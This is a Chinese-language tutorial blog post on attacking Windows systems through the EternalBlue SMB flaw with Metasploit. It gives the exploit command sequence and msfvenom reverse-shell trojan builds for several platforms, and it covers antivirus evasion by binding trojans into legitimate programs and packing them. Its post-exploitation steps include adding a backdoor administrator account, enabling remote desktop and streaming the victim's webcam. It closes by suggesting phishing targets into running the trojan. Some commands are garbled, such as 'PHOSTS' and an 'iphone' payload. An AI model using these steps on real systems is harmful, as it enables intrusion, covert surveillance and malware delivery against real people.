操作系统漏洞--渗透windows永恒之蓝(2017)整体流程
下载Kali
metasploit基本介绍
msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新
metasploit让复杂的漏洞攻击流程变得非常简单,学习几个小时,就能对操作系统等主流漏洞发起危害攻击
msf攻击windows之永恒之蓝漏洞
准备工作
msf的使用法则
使用模块-->配置模块必选项-->运行模块
三步操作,就能实现对主流漏洞的攻击
1.打开终端
2.切换至超级用户
# 切换到管理用户
sudo su
# 输入账号密码
3.进入msf的命令行
msfconsole
永恒之蓝漏洞
永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人) 公布一大批网络攻击工具,其中包含"永恒之蓝" 工具,"永恒之蓝"利用Windows系统的SMB漏洞可以获取系统最高权限,5月12日,不法分子通过改造"永恒之蓝" 制作了wannacry勒索病毒,英国,俄罗斯,整个欧洲以及中国国内多个高校校内网,大型企业内网和政府机构专网中招,被勒索支付高额赎金才能机密恢复文件.

metasploit漏洞攻击永恒之蓝
1.搜索模块
# ms17_010是微软给永恒之蓝漏洞的编号
search ms17_010

2.使用模块
use exploit/windows/smb/ms17_010_eternalblue
# 或者,根据上图最前面的序号来使用,如:
use 0
3.设置必选项
此配置为:目标IP地址,端口

攻击载荷,此配置为:攻击后想干什么,默认是获取目标主机的命令执行权限

# 1. 查看设置项,结果如上图1
show options
# 2. 如上图1中,需要配置目标IP,端口已经默认为445
set PHOSTS 192.168.1.133 # 多个目标以空格间隔,或网段192.168.1.0-254
# 3. 运行模块
run
攻击成功后,会直接进入meterpreter命令行,如下

msfvenom--远控木马生成工具
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线
[* msfvenom在shell(kali操作系统的终端)里使用,不是msfconsole终端]
会被杀毒软件发现的远控木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f exe -o demo.exe # 攻击windows,-p 指定使用哪个模块做什么操作 -f format指生成什么格式的文件 -o output指生成什么文件名
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f exe -o demo.exe # 攻击linux
msfvenom -p osx/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f exe -o demo.exe # 攻击MacOS
msfvenom -p android/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f apk -o demo.apk # 攻击android,
msfvenom -p iphone/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f exe -o demo.exe # 攻击iphone
会生成一个exe文件,但是没有人监听此木马的执行结果,所以需要启动服务监听木马是否被触发
# 1. 进入msf
msfconsole
# 2. 使用模块
use exploit/multi/handler
# 3. 查看配置项
show options
# 4. 配置必选项,将攻击载荷换为远控木马工具
set payload windows/x64/meterpreter/reverse_tcp
# 5. 再次查看配置项
show options
# 4. 配置必选项,设置监听IP和端口
set LHOST 本机KaliIP地址
set LPORT 想要监听的端口,必须与上面生成的远控木马监听端口一致
# 5. 运行模块
run
对方一点击,就会获取到目标机的命令行权限,如下图

绕过杀毒软件的远控木马
最基础的免杀(如下),不同的杀毒软件效果不同
方式1.最原始的免杀方式(效果最差):捆绑木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本机IP lport=监听端口 -f exe -x notepad++.exe -o notepad++.exe # 将木马和notepad++绑定在一起,当然也可以选择其他软件进行捆绑
方式2.加壳(压缩壳,加密壳) -- themida工具,自行百度下载即可,界面如下图
使用方式,将木马拖拽到工具中,点击Protect,如下图2,会自动生成后缀为xxx_protect.exe的文件,即是加壳后的文件


方式3.方式2是绕不过360,小红伞,等杀毒软件的
攻击成功之后能做什么
metapreter是强大的后渗透模块,可以输入help查看帮助信息
包括并不仅限于可以控制受害机的远程控制,命令执行,摄像头监控,密码获取,创建后门用户,破坏篡改系统等等,
这些看起来非常复杂又高级的操作都能用meterprete中一行或几个字母简单完成
创建后门用户并开启远程连接
shell # 进入命令行
net user zhangsan 123456 /add && net localgroup administrators zhangsan /add
exit
run getgui -e
打开对方摄像头,help中有关于摄像头的权限才可以
# 攻击成功后弹出的meterpreter终端
webcam_list # 查看目标机的摄像头列表
webcam_stream # 打开目标机的摄像头,并实时显示
远控木马种植方式
1.渗透进入目标机,种植木马
2.生成木马病毒后,钓鱼目标,想办法发送给对方,即可生成后门

浙公网安备 33010602011771号